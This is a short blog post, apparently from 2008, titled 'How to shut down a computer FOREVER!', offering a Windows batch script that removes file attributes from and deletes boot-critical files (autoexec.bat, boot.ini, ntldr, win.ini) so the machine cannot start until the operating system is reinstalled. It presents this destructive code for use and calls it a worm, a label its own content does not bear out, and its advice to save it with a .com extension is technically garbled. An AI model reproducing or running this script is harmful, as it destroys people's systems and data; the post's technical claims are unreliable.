How to shut down a computer FOREVER!
Size:
Large, Medium,
Small
Sat Sep 27, 08 04:55 AM
| Category:
All
How to shut down a computer FOREVER!
CODE
echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
// note save the above code as .com extension this is actually a worm and //shut down the xp such that boot strap loader will never be able to conduct //the initialization of os untill a new os is installed
Link:
http://blog.bitcomet.com/post/68144/
©
Add to favorites |
Quote
Reads (668) | Comments (1)